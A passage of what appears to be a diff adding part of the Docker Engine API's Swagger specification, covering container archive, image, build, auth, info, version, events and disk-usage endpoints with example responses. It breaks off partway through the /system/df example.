application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "v" + in: "query" + 
description: "Remove the volumes associated with the container." + type: "boolean" + default: false + - name: "force" + in: "query" + description: "If the container is running, kill it before removing it." + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/archive: + head: + summary: "Get information about files in a container" + description: "A response header `X-Docker-Container-Path-Stat` is returned, containing a base64-encoded JSON object with some filesystem header information about the path." + operationId: "ContainerArchiveHead" + responses: + 200: + description: "no error" + headers: + X-Docker-Container-Path-Stat: + type: "string" + description: "TODO" + 400: + description: "Bad parameter" + schema: + allOf: + - $ref: "#/definitions/ErrorResponse" + - type: "object" + properties: + message: + description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)." + type: "string" + x-nullable: false + 404: + description: "Container or path does not exist" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Resource in the container’s filesystem to archive." + type: "string" + tags: ["Container"] + get: + summary: "Get an archive of a filesystem resource in a container" + description: "Get a tar archive of a resource in the filesystem of container id." 
+ operationId: "ContainerGetArchive" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + 400: + description: "Bad parameter" + schema: + allOf: + - $ref: "#/definitions/ErrorResponse" + - type: "object" + properties: + message: + description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)." + type: "string" + x-nullable: false + 404: + description: "Container or path does not exist" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Resource in the container’s filesystem to archive." + type: "string" + tags: ["Container"] + put: + summary: "Extract an archive of files or folders to a directory in a container" + description: "Upload a tar archive to be extracted to a path in the filesystem of container id." + operationId: "ContainerPutArchive" + consumes: + - "application/x-tar" + - "application/octet-stream" + responses: + 200: + description: "The content was extracted successfully" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 403: + description: "Permission denied, the volume or container rootfs is marked as read-only." 
+ schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "No such container or path does not exist inside the container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Path to a directory in the container to extract the archive’s contents into. " + type: "string" + - name: "noOverwriteDirNonDir" + in: "query" + description: "If “1”, “true”, or “True” then it will be an error if unpacking the given content would cause an existing directory to be replaced with a non-directory and vice versa." + type: "string" + - name: "inputStream" + in: "body" + required: true + description: "The input stream must be a tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz." + schema: + type: "string" + tags: ["Container"] + /containers/prune: + post: + summary: "Delete stopped containers" + produces: + - "application/json" + operationId: "ContainerPrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ContainersDeleted: + description: "Container IDs that were deleted" + type: "array" + items: + type: "string" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /images/json: + get: + summary: "List Images" + description: "Returns a list of images on the server. 
Note that it uses a different, smaller representation of an image than inspecting a single image." + operationId: "ImageList" + produces: + - "application/json" + responses: + 200: + description: "Summary image data for the images matching the query" + schema: + type: "array" + items: + $ref: "#/definitions/ImageSummary" + examples: + application/json: + - Id: "sha256:e216a057b1cb1efc11f8a268f37ef62083e70b1b38323ba252e25ac88904a7e8" + ParentId: "" + RepoTags: + - "ubuntu:12.04" + - "ubuntu:precise" + RepoDigests: + - "ubuntu@sha256:992069aee4016783df6345315302fa59681aae51a8eeb2f889dea59290f21787" + Created: 1474925151 + Size: 103579269 + VirtualSize: 103579269 + SharedSize: 0 + Labels: {} + Containers: 2 + - Id: "sha256:3e314f95dcace0f5e4fd37b10862fe8398e3c60ed36600bc0ca5fda78b087175" + ParentId: "" + RepoTags: + - "ubuntu:12.10" + - "ubuntu:quantal" + RepoDigests: + - "ubuntu@sha256:002fba3e3255af10be97ea26e476692a7ebed0bb074a9ab960b2e7a1526b15d7" + - "ubuntu@sha256:68ea0200f0b90df725d99d823905b04cf844f6039ef60c60bf3e019915017bd3" + Created: 1403128455 + Size: 172064416 + VirtualSize: 172064416 + SharedSize: 0 + Labels: {} + Containers: 5 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "all" + in: "query" + description: "Show all images. Only images from a final layer (no children) are shown by default." + type: "boolean" + default: false + - name: "filters" + in: "query" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. + + Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label + - `before`=(`[:]`, `` or ``) + - `since`=(`[:]`, `` or ``) + - `reference`=(`[:]`) + type: "string" + - name: "digests" + in: "query" + description: "Show digest information as a `RepoDigests` field on each image." 
+ type: "boolean" + default: false + tags: ["Image"] + /build: + post: + summary: "Build an image" + description: | + Build an image from a tar archive with a `Dockerfile` in it. + + The `Dockerfile` specifies how the image is built from the tar archive. It is typically in the archive's root, but can be at a different path or have a different name by specifying the `dockerfile` parameter. [See the `Dockerfile` reference for more information](https://docs.docker.com/engine/reference/builder/). + + The Docker daemon performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. After that, each instruction is run one-by-one until the ID of the new image is output. + + The build is canceled if the client drops the connection by quitting or being killed. + operationId: "ImageBuild" + consumes: + - "application/octet-stream" + produces: + - "application/json" + parameters: + - name: "inputStream" + in: "body" + description: "A tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz." + schema: + type: "string" + format: "binary" + - name: "dockerfile" + in: "query" + description: "Path within the build context to the `Dockerfile`. This is ignored if `remote` is specified and points to an external `Dockerfile`." + type: "string" + default: "Dockerfile" + - name: "t" + in: "query" + description: "A name and optional tag to apply to the image in the `name:tag` format. If you omit the tag the default `latest` value is assumed. You can provide several `t` parameters." + type: "string" + - name: "remote" + in: "query" + description: "A Git repository URI or HTTP/HTTPS context URI. If the URI points to a single text file, the file’s contents are placed into a file called `Dockerfile` and the image is built from that file. If the URI points to a tarball, the file is downloaded by the daemon and the contents therein used as the context for the build. 
If the URI points to a tarball and the `dockerfile` parameter is also specified, there must be a file with the corresponding path inside the tarball." + type: "string" + - name: "q" + in: "query" + description: "Suppress verbose build output." + type: "boolean" + default: false + - name: "nocache" + in: "query" + description: "Do not use the cache when building the image." + type: "boolean" + default: false + - name: "cachefrom" + in: "query" + description: "JSON array of images used for build cache resolution." + type: "string" + - name: "pull" + in: "query" + description: "Attempt to pull the image even if an older image exists locally." + type: "string" + - name: "rm" + in: "query" + description: "Remove intermediate containers after a successful build." + type: "boolean" + default: true + - name: "forcerm" + in: "query" + description: "Always remove intermediate containers, even upon failure." + type: "boolean" + default: false + - name: "memory" + in: "query" + description: "Set memory limit for build." + type: "integer" + - name: "memswap" + in: "query" + description: "Total memory (memory + swap). Set as `-1` to disable swap." + type: "integer" + - name: "cpushares" + in: "query" + description: "CPU shares (relative weight)." + type: "integer" + - name: "cpusetcpus" + in: "query" + description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)." + type: "string" + - name: "cpuperiod" + in: "query" + description: "The length of a CPU period in microseconds." + type: "integer" + - name: "cpuquota" + in: "query" + description: "Microseconds of CPU time that the container can get in a CPU period." + type: "integer" + - name: "buildargs" + in: "query" + description: "JSON map of string pairs for build-time variables. Users pass these values at build-time. Docker uses the buildargs as the environment context for commands run via the `Dockerfile` RUN instruction, or for variable expansion in other `Dockerfile` instructions. 
This is not meant for passing secret values. [Read more about the buildargs instruction.](https://docs.docker.com/engine/reference/builder/#arg)" + type: "integer" + - name: "shmsize" + in: "query" + description: "Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB." + type: "integer" + - name: "squash" + in: "query" + description: "Squash the resulting images layers into a single layer. *(Experimental release only.)*" + type: "boolean" + - name: "labels" + in: "query" + description: "Arbitrary key/value labels to set on the image, as a JSON map of string pairs." + type: "string" + - name: "networkmode" + in: "query" + description: "Sets the networking mode for the run commands during + build. Supported standard values are: `bridge`, `host`, `none`, and + `container:`. Any other value is taken as a custom network's + name to which this container should connect to." + type: "string" + - name: "Content-type" + in: "header" + type: "string" + enum: + - "application/tar" + default: "application/tar" + - name: "X-Registry-Config" + in: "header" + description: | + This is a base64-encoded JSON object with auth configurations for multiple registries that a build may refer to. + + The key is a registry URL, and the value is an auth configuration object, [as described in the authentication section](#section/Authentication). For example: + + ``` + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + ``` + + Only the registry domain name (and port if not the default 443) are required. However, for legacy reasons, the Docker Hub registry must be specified with both a `https://` prefix and a `/v1/` suffix even though Docker will prefer to use the v2 registry API. 
+ type: "string" + responses: + 200: + description: "no error" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Image"] + /images/create: + post: + summary: "Create an image" + description: "Create an image by either pulling it from a registry or importing it." + operationId: "ImageCreate" + consumes: + - "text/plain" + - "application/octet-stream" + produces: + - "application/json" + responses: + 200: + description: "no error" + 404: + description: "repository does not exist or no read access" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "fromImage" + in: "query" + description: "Name of the image to pull. The name may include a tag or digest. This parameter may only be used when pulling an image. The pull is cancelled if the HTTP connection is closed." + type: "string" + - name: "fromSrc" + in: "query" + description: "Source to import. The value may be a URL from which the image can be retrieved or `-` to read the image from the request body. This parameter may only be used when importing an image." + type: "string" + - name: "repo" + in: "query" + description: "Repository name given to an image when it is imported. The repo may include a tag. This parameter may only be used when importing an image." + type: "string" + - name: "tag" + in: "query" + description: "Tag or digest. If empty when pulling an image, this causes all tags for the given image to be pulled." + type: "string" + - name: "inputImage" + in: "body" + description: "Image content if the value `-` has been specified in fromSrc query parameter" + schema: + type: "string" + required: false + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration. 
[See the authentication section for details.](#section/Authentication)" + type: "string" + tags: ["Image"] + /images/{name}/json: + get: + summary: "Inspect an image" + description: "Return low-level information about an image." + operationId: "ImageInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Image" + examples: + application/json: + Id: "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c" + Container: "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a" + Comment: "" + Os: "linux" + Architecture: "amd64" + Parent: "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + ContainerConfig: + Tty: false + Hostname: "e611e15f9c9d" + Domainname: "" + AttachStdout: false + PublishService: "" + AttachStdin: false + OpenStdin: false + StdinOnce: false + NetworkDisabled: false + OnBuild: [] + Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + User: "" + WorkingDir: "" + MacAddress: "" + AttachStderr: false + Labels: + com.example.license: "GPL" + com.example.version: "1.0" + com.example.vendor: "Acme" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Cmd: + - "/bin/sh" + - "-c" + - "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + DockerVersion: "1.9.0-dev" + VirtualSize: 188359297 + Size: 0 + Author: "" + Created: "2015-09-10T08:30:53.26995814Z" + GraphDriver: + Name: "aufs" + RepoDigests: + - "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + RepoTags: + - "example:1.0" + - "example:latest" + - "example:stable" + Config: + Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + NetworkDisabled: false + OnBuild: [] + StdinOnce: false + PublishService: "" + AttachStdin: false + OpenStdin: false + Domainname: "" + AttachStdout: false + Tty: false + Hostname: "e611e15f9c9d" 
+ Cmd: + - "/bin/bash" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Labels: + com.example.vendor: "Acme" + com.example.version: "1.0" + com.example.license: "GPL" + MacAddress: "" + AttachStderr: false + WorkingDir: "" + User: "" + RootFS: + Type: "layers" + Layers: + - "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6" + - "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such image: someimage (tag: latest)" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or id" + type: "string" + required: true + tags: ["Image"] + /images/{name}/history: + get: + summary: "Get the history of an image" + description: "Return parent layers of an image." + operationId: "ImageHistory" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + type: "object" + properties: + Id: + type: "string" + Created: + type: "integer" + format: "int64" + CreatedBy: + type: "string" + Tags: + type: "array" + items: + type: "string" + Size: + type: "integer" + format: "int64" + Comment: + type: "string" + examples: + application/json: + - Id: "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710" + Created: 1398108230 + CreatedBy: "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /" + Tags: + - "ubuntu:lucid" + - "ubuntu:10.04" + Size: 182964289 + Comment: "" + - Id: "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8" + Created: 1398108222 + CreatedBy: "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/" + Tags: [] + Size: 0 + Comment: "" + - 
Id: "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158" + Created: 1371157430 + CreatedBy: "" + Tags: + - "scratch12:latest" + - "scratch:latest" + Size: 0 + Comment: "Imported from -" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + tags: ["Image"] + /images/{name}/push: + post: + summary: "Push an image" + description: | + Push an image to a registry. + + If you wish to push an image on to a private registry, that image must already have a tag which references the registry. For example, `registry.example.com/myimage:latest`. + + The push is cancelled if the HTTP connection is closed. + operationId: "ImagePush" + consumes: + - "application/octet-stream" + responses: + 200: + description: "No error" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID." + type: "string" + required: true + - name: "tag" + in: "query" + description: "The tag to associate with the image on the registry." + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)" + type: "string" + required: true + tags: ["Image"] + /images/{name}/tag: + post: + summary: "Tag an image" + description: "Tag an image so that it becomes part of a repository." 
+ operationId: "ImageTag" + responses: + 201: + description: "No error" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID to tag." + type: "string" + required: true + - name: "repo" + in: "query" + description: "The repository to tag in. For example, `someuser/someimage`." + type: "string" + - name: "tag" + in: "query" + description: "The name of the new tag." + type: "string" + tags: ["Image"] + /images/{name}: + delete: + summary: "Remove an image" + description: | + Remove an image, along with any untagged parent images that were referenced by that image. + + Images can't be removed if they have descendant images, are being used by a running container or are being used by a build. 
+ operationId: "ImageDelete" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/ImageDeleteResponse" + examples: + application/json: + - Untagged: "3e2f21a89f" + - Deleted: "3e2f21a89f" + - Deleted: "53b4f83ac9" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + - name: "force" + in: "query" + description: "Remove the image even if it is being used by stopped containers or has other tags" + type: "boolean" + default: false + - name: "noprune" + in: "query" + description: "Do not delete untagged parent images" + type: "boolean" + default: false + tags: ["Image"] + /images/search: + get: + summary: "Search images" + description: "Search for an image on Docker Hub." 
+ operationId: "ImageSearch" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + type: "object" + properties: + description: + type: "string" + is_official: + type: "boolean" + is_automated: + type: "boolean" + name: + type: "string" + star_count: + type: "integer" + examples: + application/json: + - description: "" + is_official: false + is_automated: false + name: "wma55/u1210sshd" + star_count: 0 + - description: "" + is_official: false + is_automated: false + name: "jdswinbank/sshd" + star_count: 0 + - description: "" + is_official: false + is_automated: false + name: "vgauthier/sshd" + star_count: 0 + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "term" + in: "query" + description: "Term to search" + type: "string" + required: true + - name: "limit" + in: "query" + description: "Maximum number of results to return" + type: "integer" + - name: "filters" + in: "query" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. Available filters: + + - `stars=` + - `is-automated=(true|false)` + - `is-official=(true|false)` + type: "string" + tags: ["Image"] + /images/prune: + post: + summary: "Delete unused images" + produces: + - "application/json" + operationId: "ImagePrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + - `dangling=` When set to `true` (or `1`), prune only + unused *and* untagged images. When set to `false` + (or `0`), all unused images are pruned. 
+ type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ImagesDeleted: + description: "Images that were deleted" + type: "array" + items: + $ref: "#/definitions/ImageDeleteResponse" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Image"] + /auth: + post: + summary: "Check auth configuration" + description: "Validate credentials for a registry and, if available, get an identity token for accessing the registry without password." + operationId: "SystemAuth" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "An identity token was generated successfully." + schema: + type: "object" + required: [Status] + properties: + Status: + description: "The status of the authentication" + type: "string" + x-nullable: false + IdentityToken: + description: "An opaque token used to authenticate a user after a successful login" + type: "string" + x-nullable: false + examples: + application/json: + Status: "Login Succeeded" + IdentityToken: "9cbaf023786cd7..." 
+ 204: + description: "No error" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "authConfig" + in: "body" + description: "Authentication to check" + schema: + $ref: "#/definitions/AuthConfig" + tags: ["System"] + /info: + get: + summary: "Get system information" + operationId: "SystemInfo" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + Architecture: + type: "string" + Containers: + type: "integer" + ContainersRunning: + type: "integer" + ContainersStopped: + type: "integer" + ContainersPaused: + type: "integer" + CpuCfsPeriod: + type: "boolean" + CpuCfsQuota: + type: "boolean" + Debug: + type: "boolean" + DiscoveryBackend: + type: "string" + DockerRootDir: + type: "string" + Driver: + type: "string" + DriverStatus: + type: "array" + items: + type: "array" + items: + type: "string" + SystemStatus: + type: "array" + items: + type: "array" + items: + type: "string" + Plugins: + type: "object" + properties: + Volume: + type: "array" + items: + type: "string" + Network: + type: "array" + items: + type: "string" + ExperimentalBuild: + type: "boolean" + HttpProxy: + type: "string" + HttpsProxy: + type: "string" + ID: + type: "string" + IPv4Forwarding: + type: "boolean" + Images: + type: "integer" + IndexServerAddress: + type: "string" + InitPath: + type: "string" + InitSha1: + type: "string" + KernelVersion: + type: "string" + Labels: + type: "array" + items: + type: "string" + MemTotal: + type: "integer" + MemoryLimit: + type: "boolean" + NCPU: + type: "integer" + NEventsListener: + type: "integer" + NFd: + type: "integer" + NGoroutines: + type: "integer" + Name: + type: "string" + NoProxy: + type: "string" + OomKillDisable: + type: "boolean" + OSType: + type: "string" + OomScoreAdj: + type: "integer" + OperatingSystem: + type: "string" + RegistryConfig: + type: "object" + properties: + IndexConfigs: + type: "object" + 
additionalProperties: + type: "object" + properties: + Mirrors: + type: "array" + items: + type: "string" + Name: + type: "string" + Official: + type: "boolean" + Secure: + type: "boolean" + InsecureRegistryCIDRs: + type: "array" + items: + type: "string" + SwapLimit: + type: "boolean" + SystemTime: + type: "string" + ServerVersion: + type: "string" + examples: + application/json: + Architecture: "x86_64" + ClusterStore: "etcd://localhost:2379" + CgroupDriver: "cgroupfs" + Containers: 11 + ContainersRunning: 7 + ContainersStopped: 3 + ContainersPaused: 1 + CpuCfsPeriod: true + CpuCfsQuota: true + Debug: false + DockerRootDir: "/var/lib/docker" + Driver: "btrfs" + DriverStatus: + - + - "" + ExperimentalBuild: false + HttpProxy: "http://test:test@localhost:8080" + HttpsProxy: "https://test:test@localhost:8080" + ID: "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS" + IPv4Forwarding: true + Images: 16 + IndexServerAddress: "https://index.docker.io/v1/" + InitPath: "/usr/bin/docker" + InitSha1: "" + KernelMemory: true + KernelVersion: "3.12.0-1-amd64" + Labels: + - "storage=ssd" + MemTotal: 2099236864 + MemoryLimit: true + NCPU: 1 + NEventsListener: 0 + NFd: 11 + NGoroutines: 21 + Name: "prod-server-42" + NoProxy: "9.81.1.160" + OomKillDisable: true + OSType: "linux" + OperatingSystem: "Boot2Docker" + Plugins: + Volume: + - "local" + Network: + - "null" + - "host" + - "bridge" + RegistryConfig: + IndexConfigs: + docker.io: + Name: "docker.io" + Official: true + Secure: true + InsecureRegistryCIDRs: + - "127.0.0.0/8" + SecurityOptions: + - Key: "Name" + Value: "seccomp" + - Key: "Profile" + Value: "default" + - Key: "Name" + Value: "apparmor" + - Key: "Name" + Value: "selinux" + - Key: "Name" + Value: "userns" + ServerVersion: "1.9.0" + SwapLimit: false + SystemStatus: + - + - "State" + - "Healthy" + SystemTime: "2015-03-10T11:11:23.730591467-07:00" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + 
/version: + get: + summary: "Get version" + description: "Returns the version of Docker that is running and various information about the system that Docker is running on." + operationId: "SystemVersion" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Version: + type: "string" + ApiVersion: + type: "string" + MinAPIVersion: + type: "string" + GitCommit: + type: "string" + GoVersion: + type: "string" + Os: + type: "string" + Arch: + type: "string" + KernelVersion: + type: "string" + Experimental: + type: "boolean" + BuildTime: + type: "string" + examples: + application/json: + Version: "1.13.0" + Os: "linux" + KernelVersion: "3.19.0-23-generic" + GoVersion: "go1.6.3" + GitCommit: "deadbee" + Arch: "amd64" + ApiVersion: "1.25" + MinAPIVersion: "1.12" + BuildTime: "2016-06-14T07:09:13.444803460+00:00" + Experimental: true + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /_ping: + get: + summary: "Ping" + description: "This is a dummy endpoint you can use to test if the server is accessible." 
+ operationId: "SystemPing" + produces: + - "text/plain" + responses: + 200: + description: "no error" + schema: + type: "string" + example: "OK" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /commit: + post: + summary: "Create a new image from a container" + operationId: "ImageCommit" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + $ref: "#/definitions/IdResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "containerConfig" + in: "body" + description: "The container configuration" + schema: + $ref: "#/definitions/Config" + - name: "container" + in: "query" + description: "The ID or name of the container to commit" + type: "string" + - name: "repo" + in: "query" + description: "Repository name for the created image" + type: "string" + - name: "tag" + in: "query" + description: "Tag name for the create image" + type: "string" + - name: "comment" + in: "query" + description: "Commit message" + type: "string" + - name: "author" + in: "query" + description: "Author of the image (e.g., `John Hannibal Smith `)" + type: "string" + - name: "pause" + in: "query" + description: "Whether to pause the container before committing" + type: "boolean" + default: true + - name: "changes" + in: "query" + description: "`Dockerfile` instructions to apply while committing" + type: "string" + tags: ["Image"] + /events: + get: + summary: "Monitor events" + description: | + Stream real-time events from the server. + + Various objects within Docker report events when something happens to them. 
+ + Containers report these events: `attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update` + + Images report these events: `delete, import, load, pull, push, save, tag, untag` + + Volumes report these events: `create, mount, unmount, destroy` + + Networks report these events: `create, connect, disconnect, destroy` + + The Docker daemon reports these events: `reload` + + operationId: "SystemEvents" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Type: + description: "The type of object emitting the event" + type: "string" + Action: + description: "The type of event" + type: "string" + Actor: + type: "object" + properties: + ID: + description: "The ID of the object emitting the event" + type: "string" + Attributes: + description: "Various key/value attributes of the object, depending on its type" + type: "object" + additionalProperties: + type: "string" + time: + description: "Timestamp of event" + type: "integer" + timeNano: + description: "Timestamp of event, with nanosecond accuracy" + type: "integer" + format: "int64" + examples: + application/json: + Type: "container" + Action: "create" + Actor: + ID: "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743" + Attributes: + com.example.some-label: "some-label-value" + image: "alpine" + name: "my-container" + time: 1461943101 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "since" + in: "query" + description: "Show events created since this timestamp then stream new events." + type: "string" + - name: "until" + in: "query" + description: "Show events created until this timestamp then stop streaming." 
+ type: "string" + - name: "filters" + in: "query" + description: | + A JSON encoded value of filters (a `map[string][]string`) to process on the event list. Available filters: + + - `container=` container name or ID + - `event=` event type + - `image=` image name or ID + - `label=` image or container label + - `type=` object to filter by, one of `container`, `image`, `volume`, `network`, or `daemon` + - `volume=` volume name or ID + - `network=` network name or ID + - `daemon=` daemon name or ID + type: "string" + tags: ["System"] + /system/df: + get: + summary: "Get data usage information" + operationId: "SystemDataUsage" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + LayersSize: + type: "integer" + format: "int64" + Images: + type: "array" + items: + $ref: "#/definitions/ImageSummary" + Containers: + type: "array" + items: + $ref: "#/definitions/ContainerSummary" + Volumes: + type: "array" + items: + $ref: "#/definitions/Volume" + example: + LayersSize: 1092588 + Images: + - + Id: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749" + ParentId: "" + RepoTags: + - "busybox:latest" + RepoDigests: + - "busybox@sha256:a59906e33509d14c036c8678d687bd4eec81ed7c4b8ce907b888c607f6a1e0e6" + Created: 1466724217 + Size: 1092588 + SharedSize: 0 + VirtualSize: 1092588 + Labels: {} + Containers: 1 + Containers: + - + Id: "e575172ed11dc01bfce087fb27bee502db149e1a0fad7c296ad300bbff178148" + Names: + - "/top" + Image: "busybox" + ImageID: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749" + Command: "top" + Created: 1472592424 + Ports: [] + SizeRootFs: 1092588 + Labels: {} + State: "exited" + Status: "Exited (0) 56 minutes ago" + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + IPAMConfig: null + Links: null + Aliases: null + NetworkID: "d687bc59335f0e5c9ee8193e5612e8aee000c8c62ea170cfb99c098f95899d92" + EndpointID: 
